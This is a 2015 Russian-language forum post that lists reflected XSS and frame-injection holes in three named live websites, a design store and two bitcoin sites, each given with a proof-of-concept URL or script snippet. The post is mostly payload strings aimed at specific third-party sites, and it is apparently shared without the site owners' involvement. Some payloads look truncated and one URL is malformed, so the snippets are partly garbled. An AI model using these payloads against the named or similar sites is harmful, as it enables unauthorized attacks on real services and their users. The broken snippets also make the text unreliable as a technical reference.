26.11.2015, 11:24
|
|
Познающий
Регистрация: 17.08.2015
Сообщений: 96
С нами:
5653046
Репутация:
1
|
|
Сайт: https://www.silhouettedesignstore.com/
Уязвимость: Reflected XSS (циклящийся (понаблюдайте за страницей), можно без '"-->, но так интереснее))))
Код:
https://www.silhouettedesignstore.com/designs?search='"-->alert(123)
там же Frame Injections
Код:
https://www.silhouettedesignstore.com/designs?search=
Сайт: http://getbitco.com/
Уязвимость: Reflected XSS
Код:
http://getbitco.com/?ans=Erroralert(123456789)
Сайт: http://http:/bitganancias.com/
Уязвимость: XSS
Код:
HTMLFormElement.prototype.submit.call(document.forms[0]);
|
|
|